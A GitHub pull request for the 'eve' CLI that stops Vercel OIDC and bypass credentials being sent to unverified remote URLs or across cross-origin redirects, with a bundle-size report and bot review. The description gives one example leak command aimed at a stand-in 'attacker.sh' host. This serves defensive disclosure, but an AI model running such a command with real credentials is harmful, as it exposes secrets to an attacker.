Skip to content

fix(eve): verify remote Vercel credentials#109

Draft
ruiconti wants to merge 5 commits into
mainfrom
rui/verified-remote-credentials
Draft

fix(eve): verify remote Vercel credentials#109
ruiconti wants to merge 5 commits into
mainfrom
rui/verified-remote-credentials

Conversation

@ruiconti

@ruiconti ruiconti commented Jun 19, 2026
edited
Loading

Copy link
Copy Markdown
Contributor

Why

Today the client decides whether to attach ambient Vercel credentials by checking if the URL is local. Anything non-local gets them. That check proves the target is remote. It does not prove the target is yours.

So eve eval --url or eve dev --url against any HTTPS URL leaks both your VERCEL_OIDC_TOKEN and VERCEL_AUTOMATION_BYPASS_SECRET. For example:

npx eve dev https://attacker.sh

That one command is enough to send a request exposing both credentials.

Redirects make it worse. Even against the right host, a cross-origin 3xx carries the credentials to the redirect target, e.g. the expected host returns a compromised Location. fetch does strip Authorization on a cross-origin hop but leaves custom headers alone, which is exactly where the bypass secret and a copy of the token sit.

Locality is not authorization. Credentials should follow proof of ownership, not the shape of the URL.

What

  • Resolve the exact HTTPS origin through Vercel before installing ambient credentials.
  • Bind refreshed OIDC and automation-bypass credentials to that verified origin.
  • Keep credential-bearing clients from following redirects.
  • Route remote dev and eval clients through the same verified path.
  • Preserve EVE_EVAL_AUTH_TOKEN as an explicit bearer override.
  • Materialize .vercel/project.json in Vercel E2E setup, which the verification step reads.

The deployment resolved from the target URL is authoritative. A failed lookup leaves the client anonymous.

Scope

Security only. Project selection and the TUI authentication flow come in the next two PRs.

Stack

  1. fix(eve): verify remote Vercel credentials #109 verified remote credentials
  2. feat(eve): search team-scoped Vercel projects #110 team-scoped project selection
  3. feat(eve): recover remote TUI authentication #111 remote TUI authentication recovery

PR Checklist

  • I ran the relevant checks from CONTRIBUTING.md
  • I added tests and documentation where relevant
  • I added a changeset
  • Every commit has a DCO sign-off

@ruiconti ruiconti mentioned this pull request Jun 19, 2026
Draft
4 tasks
@vercel

vercel Bot commented Jun 19, 2026
edited
Loading

Copy link
Copy Markdown

The latest updates on your projects. Learn more about Vercel for GitHub.

Project Deployment Actions Updated (UTC)
eve-docs Ready Ready Preview, Comment, Open in v0 Jun 21, 2026 3:41am

@github-actions

github-actions Bot commented Jun 19, 2026
edited
Loading

Copy link
Copy Markdown
Contributor

Bundle + Package Summary: apps/fixtures/weather-agent

Key takeaways

  • No notable deltas vs main (bfc7191).

Delta vs main (bfc7191)

Area Metric Baseline Current Delta
Package Packed tarball 3.23 MB 3.23 MB +3.4 kB ⚠️
Package Unpacked publish size 11.58 MB 11.59 MB +9.8 kB ⚠️
Package Installed footprint 51.79 MB 51.80 MB +9.8 kB ⚠️
Package Published files 2163 2171 +8
Package Installed files 5368 5376 +8
Runtime Unique function payloads 2 2 0
Runtime Total function bytes 9.34 MB 9.34 MB -176 B ✅
Runtime Public routes 9 9 0
Changed function payloads vs main (bfc7191) (2)
Function Status Baseline Current Delta Route changes
functions/__server.func changed 3.86 MB 3.86 MB -144 B ✅ none
functions/.well-known/workflow/v1/flow.func changed 5.47 MB 5.47 MB -32 B ✅ none
Build Metadata
  • Preset: vercel
  • Nitro: nitro@3.0.260610-beta
  • Output directory: apps/fixtures/weather-agent/.vercel/output
  • Build metadata timestamp: 2026-06-19T15:35:18.932Z
  • Route aliases: 9 public, 1 internal (10 total aliases)
  • Vercel routes in config: 10
  • Severity legend: 🔴 dominant/large, 🟠 notable, 🟡 watch, ⚪ small
Package Drill-Down

Package Details

  • Package: eve@0.11.7
  • Package directory: packages/eve
  • Tarball: 3.23 MB (eve-0.11.7.tgz)
  • Unpacked payload: 11.59 MB across 2171 published files
  • Installed footprint: 51.80 MB across 5376 installed files
  • Installed root package: 10.48 MB
  • Installed dependencies: 41.32 MB
  • Runtime dependencies: 1
  • Peer dependencies: 12 (11 optional)

Installed footprint is measured from an isolated temporary npm install of the packed tarball.

Heavy installed dependencies

  • @rolldown/binding-linux-x64-gnu: 20.61 MB (39.8%)
  • eve: 10.48 MB (20.2%)
  • ai: 6.20 MB (12.0%)
  • zod: 4.97 MB (9.6%)
  • nitro: 2.41 MB (4.6%)
Publish payload breakdown 
Published file size
🟠 dist/src/compiled/experimental-ai-sdk-code-mo... [#####...................] 1.51 MB 13.0%
🟡 dist/src/compiled/@workflow/core/runtime.js      [##......................] 775.4 kB 6.7%
🟡 dist/src/compiled/@vercel/sandbox/index.js       [##......................] 632.0 kB 5.5%
🟡 dist/src/compiled/@chat-adapter/slack/index.js   [#.......................] 436.9 kB 3.8%
🟡 dist/src/compiled/_chunks/workflow/attribute-... [#.......................] 370.9 kB 3.2%
🔴 Other published files                            [########################] 7.87 MB 67.9%
Installed footprint breakdown 
Installed package size
🔴 @rolldown/binding-linux-x64-gnu [########################] 20.61 MB 39.8%
🔴 eve                             [############............] 10.48 MB 20.2%
🔴 ai                              [#######.................] 6.20 MB 12.0%
🟠 zod                             [######..................] 4.97 MB 9.6%
🟠 nitro                           [###.....................] 2.41 MB 4.6%
🟡 rolldown                        [#.......................] 771.0 kB 1.5%
🔴 Other installed packages        [#######.................] 6.37 MB 12.3%
Runtime dependencies (1)
Package Range Notes
nitro 3.0.260610-beta
Peer dependencies (12)
Package Range Notes
@opentelemetry/api ^1.0.0 optional peer
@sveltejs/kit ^2.0.0 optional peer
ai catalog:
braintrust ^3.0.0 optional peer
just-bash ^3.0.0 optional peer
microsandbox ^0.5.0 optional peer
next ^16.0.0 optional peer
nuxt ^4.0.0 optional peer
react ^19.0.0 optional peer
svelte ^5.0.0 optional peer
vite ^8.0.0 optional peer
vue ^3.5.0 optional peer
Function Drill-Down

Payload Size Graph

Unique function payload size and share of total
🔴 functions/.well-known/workflow/v1/flow.func     [########################] 5.47 MB 58.6%
🔴 functions/__server.func                         [#################.......] 3.86 MB 41.4%

Top Function Payloads

🟠 functions/.well-known/workflow/v1/flow.func • 1 public route • 5.47 MB
Metric Value
Public routes /.well-known/workflow/v1/flow
Runtime nodejs24.x
Handler index.mjs
Payload 5.47 MB
Function files 5.47 MB across 27 files
Traced dependencies 0 B
Signal 🟠 Bundled file __eve_nitro_handler__.mjs is 1.50 MB (27.5%)

🟠 🔎 Dependency Analysis

📦 Bundled files:

Bundled file size
🟠 __eve_nitro_handler__.mjs              [########################] 1.50 MB 27.5%
🟠 _chunks/runtime.mjs                    [###############.........] 958.4 kB 17.5%
🟡 _chunks/sandbox.mjs                    [############............] 766.0 kB 14.0%
🟡 _chunks/attribute-changes-Bi5DLT8S.mjs [########................] 472.2 kB 8.6%
🟡 _chunks/dist-DTchiX0N.mjs              [#######.................] 460.6 kB 8.4%
🟠 Other bundled files                    [#####################...] 1.31 MB 24.0%

🧾 Vercel Config

{
  "handler": "index.mjs",
  "launcherType": "Nodejs",
  "shouldAddHelpers": false,
  "supportsResponseStreaming": true,
  "runtime": "nodejs24.x",
  "environment": {
    "NODE_OPTIONS": "--experimental-require-module",
    "WORKFLOW_QUEUE_NAMESPACE": "eve"
  },
  "maxDuration": "max",
  "experimentalTriggers": [
    {
      "type": "queue/v2beta",
      "topic": "__eve_wkf_workflow_*",
      "consumer": "default",
      "retryAfterSeconds": 5,
      "initialDelaySeconds": 0
    }
  ]
}
🟠 functions/__server.func • 8 public routes, 1 internal alias • 3.86 MB
Metric Value
Public routes /
/eve/v1/callback/[token]
/eve/v1/connections/[name]/callback/[token]
/eve/v1/health
/eve/v1/info
/eve/v1/session
/eve/v1/session/[sessionId]
/eve/v1/session/[sessionId]/stream
Internal aliases /__server
Runtime nodejs24.x
Handler index.mjs
Payload 3.86 MB
Function files 3.86 MB across 21 files
Traced dependencies 0 B
Signal 🟠 Bundled file index.mjs is 1.40 MB (36.3%)

🟠 🔎 Dependency Analysis

📦 Bundled files:

Bundled file size
🟠 index.mjs                              [########################] 1.40 MB 36.3%
🟠 _chunks/runtime.mjs                    [###############.........] 875.8 kB 22.7%
🟠 _chunks/sandbox.mjs                    [#############...........] 766.0 kB 19.8%
🟡 _chunks/attribute-changes-Bi5DLT8S.mjs [########................] 448.5 kB 11.6%
⚪ _libs/zod.mjs                          [##......................] 114.2 kB 3.0%
🟡 Other bundled files                    [####....................] 258.8 kB 6.7%

🧾 Vercel Config

{
  "handler": "index.mjs",
  "launcherType": "Nodejs",
  "shouldAddHelpers": false,
  "supportsResponseStreaming": true,
  "runtime": "nodejs24.x"
}

@ruiconti ruiconti mentioned this pull request Jun 19, 2026
Draft
4 tasks
vercel[bot]
vercel Bot reviewed Jun 19, 2026
View reviewed changes
Comment thread packages/eve/src/setup/verified-remote-client.ts
host: new URL(input.serverUrl).host,
});

if (resolution.kind === "resolved") {

@vercel vercel Bot Jun 19, 2026
edited
Loading

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

An http:// URL pointing at a real Vercel deployment causes resolveVerifiedRemoteDevelopmentClientOptions to throw an unhandled origin-mismatch error that crashes the whole command instead of degrading to an anonymous client.

Fix on Vercel

ruiconti added 2 commits June 19, 2026 11:23
@ruiconti
fix(eve): verify remote Vercel credentials
60d80a4 
Signed-off-by: Rui Conti <ruiconti@gmail.com>
@ruiconti
fix(ci): materialize Vercel project links
f30ee3d 
Signed-off-by: Rui Conti <ruiconti@gmail.com>
@ruiconti ruiconti force-pushed the rui/verified-remote-credentials branch from bd8ba8f to f30ee3d Compare June 19, 2026 15:33
ruiconti added 2 commits June 20, 2026 20:38
@ruiconti
refactor(eve): consolidate TUI target roots
9defbf5 
Signed-off-by: Rui Conti <ruiconti@gmail.com>
@ruiconti
refactor(eve): drop unused client redirect policy
314235e 
Remove the ClientRedirectPolicy option and its threading through the
client, session, and stream paths, plus the redirect:"manual" the dev
and eval option builders set. Nothing in the eve protocol emits a 3xx,
and the Vercel Deployment Protection challenge arrives as an HTML body
(detected by vercel-auth-error), not a redirect, so the guard never
fired in practice.

Signed-off-by: Rui Conti <ruiconti@gmail.com>
vercel[bot]
vercel Bot reviewed Jun 21, 2026
View reviewed changes
Comment thread packages/eve/src/services/dev-client/client-options.ts
@ruiconti
Revert "refactor(eve): drop unused client redirect policy"
6cb11a3 
This reverts commit 314235e. Removing redirect:"manual" from the
credential-bearing client reintroduced a header-leak vector: undici
strips Authorization on a cross-origin 3xx but not custom headers, so
x-vercel-trusted-oidc-idp-token and x-vercel-protection-bypass would be
forwarded to the redirect target. The deployment is a full app that can
emit cross-origin redirects (auth middleware, domain canonicalization,
rewrites), so the guard is load-bearing defense-in-depth, not dead code.

Signed-off-by: Rui Conti <ruiconti@gmail.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@vercel vercel[bot] vercel[bot] left review comments

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@ruiconti